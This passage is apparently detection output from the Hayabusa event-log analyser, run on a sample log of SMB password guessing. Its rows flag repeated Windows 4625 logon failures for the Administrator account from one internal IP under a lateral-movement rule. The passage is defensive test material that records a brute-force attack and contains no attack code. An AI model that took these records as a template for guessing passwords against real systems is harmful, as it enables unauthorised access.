+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: 
